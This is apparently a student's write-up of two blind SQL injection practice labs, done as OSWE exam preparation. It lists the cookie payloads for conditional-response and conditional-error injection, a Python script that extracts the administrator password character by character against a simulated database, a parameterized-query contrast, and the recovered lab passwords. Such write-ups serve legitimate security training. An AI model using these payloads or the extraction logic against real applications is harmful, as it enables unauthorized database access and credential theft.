This topic is explained in detail in the OSWE course, and I assume that it will be tested in the exam.
Lab: Blind SQL injection with conditional responses
Intro
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Solution
Trying the traditional injection method to select username and password from the users table gives no output. Start the session in Burp.
In the Burp session, it can be seen that the request carries a tracking cookie and a session id:
Cookie: TrackingId=vQKvLxRCijcrlFoo; session=1kmuR4Flcru129GQHmwUqNTKz12AbG2J
It can be verified that TrackingId is vulnerable to SQL injection, because an input like TrackingId=a' or 1=1--
makes a "Welcome back" message appear on the home page. A blind SQL injection is thus possible through the conditional response (whether "Welcome back" appears).
We can then manually verify that the administrator account exists in the target database:
Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator'--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo
After that, we can determine the length of the password for the administrator user:
Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and length(password)=20--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo
This shows that the password is 20 characters long, which means it is impractical to recover it by hand. I developed the following Python code to verify the blind SQL injection vulnerability.
import requests
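Only the first line of the author's script survives on the page. As an added example, not the author's code, the following rebuilds the lab's oracle offline on a constructed SQLite table (so unicode(substr(...)) stands in for ascii(substring(...))), recovers the password character by character with the same conditional-response logic, and shows that the identical probes learn nothing once the lookup uses a bound parameter.

```python
import sqlite3

# Constructed in-memory stand-in for the lab backend: the tracking table the
# cookie is looked up in, plus the users table holding the password from the page.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE tracking (trackingid TEXT)")
db.execute("INSERT INTO tracking VALUES ('vQKvLxRCijcrlFoo')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('administrator', 'futqttlev8verb4m7res')")


def vulnerable_page(tracking_id):
    """Mirrors the lab: the cookie is concatenated into the query and the only
    observable difference is whether the 'Welcome back' banner is shown."""
    sql = f"SELECT trackingid FROM tracking WHERE trackingid = '{tracking_id}'"
    return "Welcome back" if db.execute(sql).fetchall() else ""


def hardened_page(tracking_id):
    """Same lookup with a bound parameter: the cookie value is only ever data."""
    sql = "SELECT trackingid FROM tracking WHERE trackingid = ?"
    return "Welcome back" if db.execute(sql, (tracking_id,)).fetchall() else ""


def condition_true(page, condition):
    """Boolean oracle built like the page's cookies: the UNION row, and hence
    the banner, exists only when the condition on administrator's row holds."""
    payload = ("a' UNION SELECT 'a' FROM users WHERE username = 'administrator' "
               f"AND {condition}--")
    return "Welcome back" in page(payload)


def extract_password(page, max_len=40):
    """Recover the password one character at a time. SQLite has no ascii() or
    substring(), so unicode(substr(...)) plays the role of ascii(substring(...))."""
    length = next((n for n in range(1, max_len + 1)
                   if condition_true(page, f"length(password) = {n}")), 0)
    password = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # binary search over printable ASCII: ~7 requests per char
        while lo < hi:
            mid = (lo + hi) // 2
            if condition_true(page, f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        password += chr(lo)
    return password
```

Against the real lab the two page functions would be replaced by a requests call that sets the TrackingId cookie and checks the response body, which is what the author's script with ascii(substring) does.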
The final password is: futqttlev8verb4m7res
Lab: Blind SQL injection with conditional errors
Intro
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Solution
This lab is similar to the previous one, with the conditional response replaced by conditional errors. I didn't know much about conditional error injection, so I mostly referred to: SQL_Injection_Cheatsheet
Based on the conditional error injection statement, I developed the cookie to be:
Cookie: TrackingId=' UNION SELECT CASE WHEN (condition) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
With the same technique, we can identify that the administrator user is in the users table:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Now I can identify the length of the password for the administrator user:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator' and length(password)=20) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
As in the previous lab, the password length is 20. Let's develop the Python script.
import requests
The final password is: tdosf5caziu4dsh5ry1j
Endnote
In the official online lab solution, Burp Intruder is suggested for conducting the attack. However, the official OSWE material suggests using Python instead of Burp. To stay consistent with that, I use a coding style similar to the official OSWE one (with ascii(substring)) to prepare for the exam.